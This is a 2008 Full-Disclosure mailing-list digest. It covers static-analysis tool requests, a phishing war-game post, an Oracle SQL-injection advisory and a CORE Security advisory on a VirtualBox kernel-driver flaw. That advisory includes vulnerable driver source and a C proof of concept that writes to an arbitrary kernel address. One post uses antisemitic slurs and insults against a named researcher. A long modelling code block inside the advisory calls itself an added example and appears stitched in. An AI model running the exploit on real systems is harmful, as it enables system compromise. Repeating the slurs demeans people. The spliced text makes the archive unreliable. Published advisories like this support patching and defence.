<002801c8f6ab$9890b500$c9b21f00$@com> Hi Fionnbharr: Thanks for your suggestion?But what I really need is a SOURCE CODE static analysis tool :( Would you like to be kind enough to show me something others for the source code. 
-----Original Message----- From: Fionnbharr [mailto:thouth at gmail.com] Sent: Tuesday, August 05, 2008 8:28 AM To: Dean Pierce Cc: modversion; full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] free static analysis tool for c/c++ http://www.eresi-project.org/ http://www.phrack.org/issues.html?issue=64&id=8#article Nice jokes Dean. Preeeetty funny. 2008/8/5 Dean Pierce : > Awesome! > I hadn't realized that I could use fd to make requests also. > > I would like some quicktime 0day, some bitchin shellcode that makes > all the windows melt away revealing the word "PWNT" in big red letters > on a black background, and 3 gallons of chocolate milk. > > On a side note, lack of proper static analysis tools in the OSS > community makes the baby jesus cry. > > - DEAN > > modversion wrote: >> hi list: >> I want a free static analysis tool for c/c++ code in win32 >> platform,which do not need to compile the codes. >> >> I tried rats,its4 and flawfinder,but it seems that they can only >> found the dangerous functions like strcpy. >> >> >> >> --------------------------------------------------------------------- >> --- >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From rholgstad at gmail.com Tue Aug 5 06:26:03 2008 From: rholgstad at gmail.com (Robert Holgstad) Date: Tue, 5 Aug 2008 00:26:03 -0500 Subject: [Full-disclosure] more rehashes of xss & 'evil gif' Message-ID: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html seems dan isn't the only press whore around! 
rebouncing from his embarasing post about 'deputy dan' and the matasano blog - whoosh anyone? nate and his crew of javascript gurus have whipped up another rehash of an old class of bugs that has been used in the wild for a long time. we personally want to thank nate for his great work hes done for conferences over the years filling up their talking spots with useless crap. his work is only rivaled by gadi evron who gets accepted to every conference because declining a fat AND jewish person is guarenteed to get 1000s of big nosed ambulance chasers after you by the end of business day. once again we would ilke to thank nate for his cutting edge research and hopefully he will get nommed for next years pwnie life time acheivement award! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/8be82dda/attachment.html From spreadlulzandwar at gmail.com Tue Aug 5 07:12:22 2008 From: spreadlulzandwar at gmail.com (raining lulz) Date: Tue, 5 Aug 2008 02:12:22 -0400 Subject: [Full-disclosure] more rehashes of xss & 'evil gif' In-Reply-To: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> References: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> Message-ID: <418a7b2c0808042312m632ce57cu9d4b58012b278262@mail.gmail.com> Clearly this class of vulnerabilities is nothing short of epic, entirely new, and truly worth our time and fear. When combined with the stellar research and presentation skills of said researchers it meets 3/4 requirements for widespread media cuntbaggery, observe: 1) words that sound new and cool -->"The attack relies on a new type of hybrid file" hybrid: hybrid, hmm sort of hydra, sort of like internet super worm of doom??!! watchout! 2)social networking sites -->"giving the bad guys access to the victim's Facebook account." zomgz did someone say facebook? watch out, your teenage whore daughter is now at risk! 
3)moderately not clever acronym -->"They call this type of file a GIFAR, a contraction of GIF and JAR" plus it sounds like some sort of mythical beast?! GIFAR, ROAR! do you think they'll have a cool animation for it on their slides? one can only dream! wait, what about the 4th requirement? how about the possibility of anyone actually being owned? wait, no. On Tue, Aug 5, 2008 at 1:26 AM, Robert Holgstad wrote: > > http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html > > seems dan isn't the only press whore around! rebouncing from his embarasing > post about 'deputy dan' and the matasano blog - whoosh anyone? nate and his > crew of javascript gurus have whipped up another rehash of an old class of > bugs that has been used in the wild for a long time. we personally want to > thank nate for his great work hes done for conferences over the years > filling up their talking spots with useless crap. his work is only rivaled > by gadi evron who gets accepted to every conference because declining a fat > AND jewish person is guarenteed to get 1000s of big nosed ambulance chasers > after you by the end of business day. > > once again we would ilke to thank nate for his cutting edge research and > hopefully he will get nommed for next years pwnie life time acheivement > award! > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/06400e14/attachment.html From advisories at coresecurity.com Mon Aug 4 21:38:32 2008 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Mon, 04 Aug 2008 17:38:32 -0300 Subject: [Full-disclosure] CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability Message-ID: <489768C8.5060701@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Sun xVM VirtualBox Privilege Escalation Vulnerability *Advisory Information* Title: Sun xVM VirtualBox Privilege Escalation Vulnerability Advisory ID: CORE-2008-0716 Advisory URL: http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability Date published: 2008-08-04 Date of last update: 2008-08-04 Vendors contacted: Sun Microsystems Release mode: Coordinated release *Vulnerability Information* Class: Insufficient input validation Remotely Exploitable: No Locally Exploitable: Yes Bugtraq ID: 30481 CVE Name: CVE-2008-3431 *Vulnerability Description* Virtualization technologies allow users to run different operating systems simultaneously on top of the same set of underlying physical hardware. This provides several benefits to end users and organizations, including efficiency gains in the use of hardware resources, reduction of operational costs, dynamic re-allocation of computing resources and rapid deployment and configuration of software development and testing environments. VirtualBox is an open source virtualization technology project originally developed by Innotek, a software company based in Germany. In February 2008 Sun Microsystems announced the acquisition of Innotek [1] and VirtualBox was integrated into Sun's xVM family of virtualization technologies. 
In May 2008, Sun Microsystems announced that the number of downloads of the open source VirtualBox software package passed the five million mark [2]. When used on a Windows Host Operating System VirtualBox installs a kernel driver ('VBoxDrv.sys') to control virtualization of guest Operating Systems. An input validation vulnerability was discovered within VirtualBox's 'VBoxDrv.sys' driver that could allow an attacker, with local but un-privileged access to a host where VirtualBox is installed, to execute arbitrary code within the kernel of the Windows host operating system and to gain complete control of a vulnerable computer system. *Vulnerable Packages* . Sun xVM VirtualBox 1.6.2. . Sun xVM VirtualBox 1.6.0. . This issue only occurs in the Microsoft Windows versions of xVM VirtualBox. *Non-vulnerable Packages* . Sun xVM VirtualBox 1.6.4 (for Microsoft Windows) *Vendor Information, Solutions and Workarounds* No workarounds exist for this issue. A security bulletin from the vendor that describes this issue is available here: http://sunsolve.sun.com/search/document.do?assetkey=1-66-240095-1. *Credits* This vulnerability was discovered and researched by Anibal Sacco from the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies. *Technical Description / Proof of Concept Code* When the VirtualBox package is installed on a host the 'VBoxDrv.sys' driver is loaded on the machine. This driver allows any unprivileged user to open the device '\\.\VBoxDrv' and issue IOCTLs with a buffering mode of METHOD_NEITHER without any kind of validation. This allows untrusted user mode code to pass arbitrary kernel addresses as arguments to the driver. With specially constructed input, a malicious user can use functionality within the driver to patch kernel addresses and execute arbitrary code in kernel mode. When handling IOCTLs a communication method must be pre-defined between the user-mode application and the driver module. 
The selected method will determine how the I/O Manager manipulates the memory buffers used in the communication. 'METHOD_NEITHER' is a very dangerous method because the pointer passed to 'DeviceIoControl' as input or output buffer is sent directly to the driver, transferring to it the responsibility of doing the proper checks to validate the addresses sent from user mode. The 'VBoxDrv.sys' driver uses the 'METHOD_NEITHER' communication method when handling IOCTL requests and does not properly validate the buffer sent in the Irp object, allowing an attacker to write to any memory address in kernel mode. Let's see the bug in the source. This is the function used to handle the IOCTL requests in 'SUPDrv-win.cpp'.

/-----------
NTSTATUS _stdcall VBoxDrvNtDeviceControl(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{
    PSUPDRVDEVEXT       pDevExt  = (PSUPDRVDEVEXT)pDevObj->DeviceExtension;
    PIO_STACK_LOCATION  pStack   = IoGetCurrentIrpStackLocation(pIrp);
    PSUPDRVSESSION      pSession = (PSUPDRVSESSION)pStack->FileObject->FsContext;

    /*
     * Deal with the two high-speed IOCtl that takes it's arguments from
     * the session and iCmd, and only returns a VBox status code.
     */
    ULONG ulCmd = pStack->Parameters.DeviceIoControl.IoControlCode;
    if (    ulCmd == SUP_IOCTL_FAST_DO_RAW_RUN           (1)
        ||  ulCmd == SUP_IOCTL_FAST_DO_HWACC_RUN
        ||  ulCmd == SUP_IOCTL_FAST_DO_NOP)
    {
        KIRQL oldIrql;
        int   rc;

        /* Raise the IRQL to DISPATCH_LEVEl to prevent Windows from rescheduling us to another CPU/core. */
        Assert(KeGetCurrentIrql() <= DISPATCH_LEVEL);
        KeRaiseIrql(DISPATCH_LEVEL, &oldIrql);
(2)     rc = supdrvIOCtlFast(ulCmd, pDevExt, pSession);
        KeLowerIrql(oldIrql);

        /* Complete the I/O request. */
        NTSTATUS rcNt = pIrp->IoStatus.Status = STATUS_SUCCESS;
        pIrp->IoStatus.Information = sizeof(rc);
        __try
        {
(3)         *(int *)pIrp->UserBuffer = rc;
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
            rcNt = pIrp->IoStatus.Status = GetExceptionCode();
            dprintf(("VBoxSupDrvDeviceContorl: Exception Code %#x\n", rcNt));
        }
        IoCompleteRequest(pIrp, IO_NO_INCREMENT);
        return rcNt;
    }

    return VBoxDrvNtDeviceControlSlow(pDevExt, pSession, pIrp, pStack);
}
- -----------/

At (1), we can see the statement checking the IOCTL code. The constants used are defined in 'SUPDrvIOC.h' in this way:

/-----------
#define SUP_IOCTL_FAST_DO_RAW_RUN      SUP_CTL_CODE_FAST(64)
/** Fast path IOCtl: VMMR0_DO_HWACC_RUN */
#define SUP_IOCTL_FAST_DO_HWACC_RUN    SUP_CTL_CODE_FAST(65)
/** Just a NOP call for profiling the latency of a fast ioctl call to VMMR0. */
#define SUP_IOCTL_FAST_DO_NOP          SUP_CTL_CODE_FAST(66)
- -----------/

With the macro 'SUP_CTL_CODE_FAST()' defined in the same file:

/-----------
#define SUP_CTL_CODE_FAST(Function)  CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_NEITHER, FILE_WRITE_ACCESS)
- -----------/

Now we know that the communication method used will be 'METHOD_NEITHER' (this could also be easily seen by looking at the resulting IOCTL code in the disassembled binary). Then at (2) the value returned by 'supdrvIOCtlFast()' is saved in 'rc', and this is where the problem starts, because at (3) the value in 'rc' is written directly to the buffer pointer sent from user mode without any check to validate that it is really pointing to a user-mode address, or even a valid one. In this scenario, it is possible to feed the IOCTL with kernel addresses to write the value returned by 'supdrvIOCtlFast()' to ANY address in kernel space memory, as many times as necessary to modify kernel code or kernel pointers and subsequently get code execution in ring 0 context (that is, with system privileges). This is the Proof of Concept I have made to trigger and show the vulnerability.
This will generate a Blue Screen of Death (BSOD) trying to write to an unpaged kernel-mode address (0x80808080), but any other arbitrary address could be used.

/-----------
// Author: Anibal Sacco (aLS)
// Contact: anibal.sacco at coresecurity.com
//          anibal.sacco at gmail.com
// Organization: Core Security Technologies

#include <windows.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    HANDLE hDevice;
    DWORD  cb;
    char   szDevice[] = "\\\\.\\VBoxDrv";

    /* Any unprivileged user can open the device. */
    if ((hDevice = CreateFileA(szDevice, GENERIC_READ|GENERIC_WRITE, 0, 0,
                               OPEN_EXISTING, 0, NULL)) != INVALID_HANDLE_VALUE)
    {
        printf("Device %s successfully opened!\n", szDevice);
    }
    else
    {
        printf("Error: Error opening device %s\n", szDevice);
        return 1;   /* do not issue the IOCTL on an invalid handle */
    }

    /* 0x228103 == CTL_CODE(FILE_DEVICE_UNKNOWN, 64, METHOD_NEITHER, FILE_WRITE_ACCESS),
     * one of the fast-path codes handled above. With METHOD_NEITHER the driver
     * receives the raw pointer 0x80808080 as pIrp->UserBuffer and writes its
     * int return code through it without validation. */
    cb = 0;
    if (!DeviceIoControl(hDevice, 0x228103, (LPVOID)0x80808080, 0,
                         (LPVOID)0x80808080, 0x0, &cb, NULL))
    {
        printf("Error in DeviceIo ... bytes returned %#x\n", cb);
    }
    return 0;
}
- -----------/

*Report Timeline* . 2008-07-16: Core Security Technologies notifies the VirtualBox team of the vulnerability. . 2008-07-17: Vendor acknowledges notification. . 2008-07-29: Core asks the vendor for a status update in the fixing process. . 2008-07-30: Vendor notifies a patched version will be publicly available on Monday 4th, August. . 2008-07-31: Core asks the vendor to provide URL to their alert and to confirm which versions are vulnerable and which version will include the fix. . 2008-07-31: CVE ID request sent to Mitre. . 2008-07-31: Bugtraq ID request sent to SecurityFocus.com. . 2008-07-31: CVE ID received from Mitre. . 2008-07-31: Bugtraq ID received SecurityFocus.com. . 2008-08-01: Vendor provides draft version of Sun Alert and URL to reference it. . 2008-08-01: Core updates its security advisory with information about vulnerable and non-vulnerable packages. Core provides its URL to the vendor and indicates that the vendor cataloged the issue as a Denial of Service bug but it should be considered a privilege escalation problem since it allows unprivileged users to execute code in the kernel context. .
2008-08-04: Vendor confirms that this issue can lead to arbitrary code execution by an unprivileged user. . 2008-08-04: CORE-2008-0716 advisory is published. *References* [1] Sun Welcomes Innotek - http://www.sun.com/software/innotek/. [2] http://www.sun.com/aboutsun/pr/2008-05/sunflash.20080529.1.xml. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 
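The check that is missing at (3) is a probe of the user-supplied pointer before the kernel dereferences it, which is what ProbeForWrite() exists for in a METHOD_NEITHER handler. What follows is an added example, not code from the advisory, from Core, or from VirtualBox: a host-side C model of the rules ProbeForWrite() enforces on a 32-bit Windows kernel (buffer aligned, entirely below MmUserProbeAddress, and no wrap-around of address plus length), applied to the fast-path completion shown above. The 32-bit address space, the 0x7FFF0000 probe boundary (the x86 default without /3GB) and the STATUS_* values are modelled as constants, and "kernel memory" is only a flag recording whether the 4-byte write would have landed above the boundary; nothing here touches a real driver.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Modelled constants (assumptions for this example; 32-bit x86 Windows). */
#define MM_USER_PROBE_ADDRESS         0x7FFF0000u   /* MmUserProbeAddress, no /3GB */
#define STATUS_SUCCESS                0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT  0x80000002u
#define STATUS_ACCESS_VIOLATION       0xC0000005u

typedef uint32_t ntstatus_t;

/* Host-side model of ProbeForWrite(Address, Length, Alignment).
 * The real routine raises an exception; this one returns the status it
 * would raise so that the caller can complete the IRP with it.
 *   - a zero-length probe is accepted, as on Windows
 *   - the address must be aligned to 'align'
 *   - [addr, addr+len) must lie entirely below MmUserProbeAddress
 *   - 'len > boundary - addr' also rejects a length that would wrap */
ntstatus_t probe_for_write(uint32_t addr, uint32_t len, uint32_t align)
{
    if (len == 0)
        return STATUS_SUCCESS;
    if (align != 0 && (addr % align) != 0)
        return STATUS_DATATYPE_MISALIGNMENT;
    if (addr >= MM_USER_PROBE_ADDRESS)
        return STATUS_ACCESS_VIOLATION;
    if (len > MM_USER_PROBE_ADDRESS - addr)
        return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* Model of the fast-path completion in VBoxDrvNtDeviceControl():
 * user_buffer stands for pIrp->UserBuffer, rc for the supdrvIOCtlFast()
 * result. With probe == false it behaves like the vulnerable code and the
 * write "lands" wherever the caller pointed (the advisory's PoC crashes the
 * box at 0x80808080; a mapped kernel address would be overwritten silently).
 * With probe == true the pointer is validated first and the request is
 * completed with the probe's status, so no kernel write happens. */
ntstatus_t complete_fast_ioctl(uint32_t user_buffer, int rc, bool probe,
                               bool *kernel_write)
{
    *kernel_write = false;
    if (probe) {
        ntstatus_t st = probe_for_write(user_buffer, sizeof(rc), sizeof(rc));
        if (st != STATUS_SUCCESS)
            return st;
    }
    /* *(int *)pIrp->UserBuffer = rc;  -- modelled, not performed */
    (void)rc;
    if (user_buffer >= MM_USER_PROBE_ADDRESS)
        *kernel_write = true;
    return STATUS_SUCCESS;
}

/* Small wrappers so each outcome is a plain return value. */
ntstatus_t fast_ioctl_status(uint32_t user_buffer, bool probe)
{
    bool hit;
    return complete_fast_ioctl(user_buffer, 0, probe, &hit);
}

bool kernel_write_reached(uint32_t user_buffer, bool probe)
{
    bool hit;
    (void)complete_fast_ioctl(user_buffer, 0, probe, &hit);
    return hit;
}

int main(void)
{
    /* The PoC's address against the unpatched path, then with the probe. */
    printf("unpatched: status %#x, kernel write %s\n",
           (unsigned)fast_ioctl_status(0x80808080u, false),
           kernel_write_reached(0x80808080u, false) ? "YES" : "no");
    printf("probed:    status %#x, kernel write %s\n",
           (unsigned)fast_ioctl_status(0x80808080u, true),
           kernel_write_reached(0x80808080u, true) ? "YES" : "no");
    return 0;
}
```

The third rule is the one people forget: checking only the start address lets a caller pass a user-mode pointer with a length that runs past the boundary, or one that wraps the 32-bit address space, so the probe must bound the end of the range as well. In a real driver the probe goes inside the __try block, since ProbeForWrite raises rather than returns, and the handler completes the IRP with GetExceptionCode() exactly as the __except above already does.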
*Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIl2jIyNibggitWa0RAtj0AJ9HSRe3Hq+SCqU0RfU2LwaxINL1NwCdH5p+ md6p6ZKbhrc7SfaD6EsxjoA= =kQyV -----END PGP SIGNATURE----- From arasm at vt.edu Mon Aug 4 22:34:09 2008 From: arasm at vt.edu (Memisyazici, Aras) Date: Mon, 4 Aug 2008 17:34:09 -0400 Subject: [Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN) In-Reply-To: <4897313A.2030607@appsecinc.com> References: <4897313A.2030607@appsecinc.com> Message-ID: <4C058118EC56B34E809904A5D0DA3087043716E6@elessar.cc.w2k.vt.edu> Umm... >> By default, users granted DBA have the required privilege. << So... You are saying, people should beware of DBAs (Database Administrators... AKA DB Gods) having the possibility to do SQL injection? Riighhtt... And why should they go through the trouble of exploiting a webapp to manipulate data in the DB? They're DBAs... As in they already CAN manipulate the data in the database since they sort of ADMINISTER it! 
Aras "Russ" Memisyazici Systems Administrator Office of Vice President for Research Virginia Tech -----Original Message----- From: Team SHATTER [mailto:shatter at appsecinc.com] Sent: Monday, August 04, 2008 12:42 PM To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk Subject: Team SHATTER Security Advisory: SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN) August 4, 2008 Risk Level: Medium Affected versions: Oracle Database Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1 Remotely exploitable: Yes (Authentication to Database Server is needed) Credits: This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc. Details: The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of the SYS user. Impact: Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges. Vendor Status: Vendor was contacted and a patch was released. Workaround: Restrict access to the SYS.DBMS_DEFER_SYS package. Fix: Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink.
Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2592 Timeline: Vendor Notification - 9/24/2007 Vendor Response - 9/28/2007 Fix - 7/15/2008 Public Disclosure - 7/23/2008 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkiXMToACgkQ9EOAcmTuFN3LGQCeK6pvkshjrIqiw8rdmE8tWIdK O9sAnjeSiwasj2U7SpoPhQVvYKyYvUMI =X2Bp -----END PGP SIGNATURE----- From hackbunny at s0ftpj.org Tue Aug 5 11:10:47 2008 From: hackbunny at s0ftpj.org (KJK::Hyperion) Date: Tue, 05 Aug 2008 12:10:47 +0200 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> Message-ID: <48982727.5020901@s0ftpj.org> modversion ha scritto: > I want a free static analysis tool for c/c++ code in win32 > platform,which do not need to compile the codes. have you tried Microsoft's PREfast? From biz.marqee at gmail.com Tue Aug 5 11:31:08 2008 From: biz.marqee at gmail.com (Biz Marqee) Date: Tue, 5 Aug 2008 20:31:08 +1000 Subject: [Full-disclosure] phish war game In-Reply-To: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net> References: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net> Message-ID: Dude give it up... No . One. Cares. At all. Accept that your ideas suck.. oh and you're an attention seeking douche bag -- or maybe a bad troll. I guess pegasusmail_html.cpp will answer my questions... 
On Tue, Aug 5, 2008 at 11:03 AM, lsi wrote: > BLUE TEAM: anti-phishing blacklist > RED TEAM: phish > GREEN TEAM: end-users > > starting degree of obfuscation: 0% (none) > starting number of blocked domains: 0 > > ---------- > > round 1: > > action: RED sends billions of phish > consequence: 5% of GREEN members are suckered and lose some cash > > action: BLUE blocks the top 20 phished domains using the FROM field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 0% > current number of blocked domains: 20 > > round 2: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 4% of GREEN members are suckered and lose some cash > > action: BLUE blocks the next top 20 phished domains using the FROM > field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 20% > current number of blocked domains: 40 > > round 3: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 3% of GREEN members are suckered and lose some cash > > action: BLUE blocks the next top 20 phished domains using the FROM > field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 24% > current number of blocked domains: 60 > > round 4: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 2% of GREEN members are suckered and lose some cash > > action: BLUE blocks the next top 20 phished domains using the FROM > field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 28.8% > current number of blocked domains: 80 > > round 5: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 1% of GREEN members are suckered and lose some cash > > action: BLUE blocks the 
next top 20 phished domains using the FROM > field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 34.56% > current number of blocked domains: 100 > > round 6: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 0% of GREEN members are suckered and lose some cash > > ---------- > > GAME OVER: RED loses at round 6, as 0% of GREEN members are suckered, > due to over-obfuscation. > > final degree of obfuscation: 41.47% > final number of blocked domains: 100 > > ---------- > > observations: > > 1. The model is over-simplified, in reality it's unlikely that BLUE > would consistently achieve 80%. However in reality it's also > unlikely that RED would enjoy a linear relationship between > obfuscation and success, specifically, the more RED obfuscates the > less success it has. Both teams might suffer diminishing returns > from their efforts. (for the purposes of the above model, these > effects have been allowed to cancel each other out) > > 2. The model has a constant 1% reduction in the victim rate, this is > debatable, however it will never go upwards, eg., there is nothing > RED can do to push that number back towards 100%. Conversely, > everything BLUE does pushes that number towards 0%. In addition, > other anti-phishing technologies will also be pushing the number > towards 0%. GREEN itself might even push the number down. > > 3. The model does not allow RED to increase the number of phish they > send. In reality, they way well do so. However they will blocked > faster in this case, not only by BLUE but also by other technologies, > such as spam filters. (for the purposes of the above model, these > effects have been allowed to cancel each other out) > > 4. The model does not allow the game to be terminated voluntarily. 
> In reality, RED will terminate the game voluntarily when phish > revenue per hour falls below revenues per hour available from other > sources. This will be some time before 0% of GREEN members are > suckered, perhaps as early as round 3. > > 5. The blacklist contains 100 items at the time RED loses. It may > contain as little as 60 at the time RED terminates voluntarily. > > ---------- > > links: > > (...) > http://en.wikipedia.org/wiki/Business_War_Games > > (this is a sales brochure, however it describes a war game a bit > nicer than wiki, it's got diagrams, for a start) > http://www.coleago.co.uk/uploads/Training/War%20Gaming.pdf > > (this isn't relevant to a war game, it might be something like what's > happening when the top 20 phished domains are used to select the > items to blacklist, OTOH, it might not, I don't know, I'm not a > statistician. I'd love to know the name of the technique, I use > something similar to optimise my spam rules...) > http://en.wikipedia.org/wiki/Monte_Carlo_method > > (this was mentioned in one of the papers I quoted previously) > http://en.wikipedia.org/wiki/Pareto_principle > > --- > Stuart Udall > stuart at at cyberdelix.dot net - http://www.cyberdelix.net/ > > --- > * Origin: lsi: revolution through evolution (192:168/0.2) > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/10b3f4b3/attachment.html From modversion at gmail.com Tue Aug 5 12:23:32 2008 From: modversion at gmail.com (modversion) Date: Tue, 5 Aug 2008 19:23:32 +0800 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <48982727.5020901@s0ftpj.org> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <48982727.5020901@s0ftpj.org> Message-ID: <005d01c8f6ed$b3f77440$1be65cc0$@com> Hi KJK: PREfast only works with Visual Studio; can any standalone tool do it? -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of KJK::Hyperion Sent: Tuesday, August 05, 2008 6:11 PM Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] free static analysis tool for c/c++ modversion ha scritto: > I want a free static analysis tool for c/c++ code in win32 > platform,which do not need to compile the codes. have you tried Microsoft's PREfast? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From hackbunny at s0ftpj.org Tue Aug 5 12:27:31 2008 From: hackbunny at s0ftpj.org (KJK::Hyperion) Date: Tue, 05 Aug 2008 13:27:31 +0200 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <005d01c8f6ed$b3f77440$1be65cc0$@com> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <48982727.5020901@s0ftpj.org> <005d01c8f6ed$b3f77440$1be65cc0$@com> Message-ID: <48983923.7060600@s0ftpj.org> modversion ha scritto: > PREfast can only work with the Visual Studio,any standalone tools > can make it ?
just run the command line compiler with the /analyze switch, no need to use Visual Studio From modversion at gmail.com Tue Aug 5 13:31:54 2008 From: modversion at gmail.com (modversion) Date: Tue, 5 Aug 2008 20:31:54 +0800 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <48983923.7060600@s0ftpj.org> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <48982727.5020901@s0ftpj.org> <005d01c8f6ed$b3f77440$1be65cc0$@com> <48983923.7060600@s0ftpj.org> Message-ID: <006401c8f6f7$4072a7b0$c157f710$@com> Hi KJK: Thanks for your help :) I cannot compile the code because I can't touch it. The developer will upload their code and call the source code scan engine to find security bugs. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of KJK::Hyperion Sent: Tuesday, August 05, 2008 7:28 PM Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] free static analysis tool for c/c++ modversion ha scritto: > PREfast can only work with the Visual Studio,any standalone tools can > make it ? just run the command line compiler with the /analyze switch, no need to use Visual Studio _______________________________________________ Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From xploitable at gmail.com Tue Aug 5 13:58:55 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 5 Aug 2008 13:58:55 +0100
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: <15949.1217821466@turing-police.cc.vt.edu>
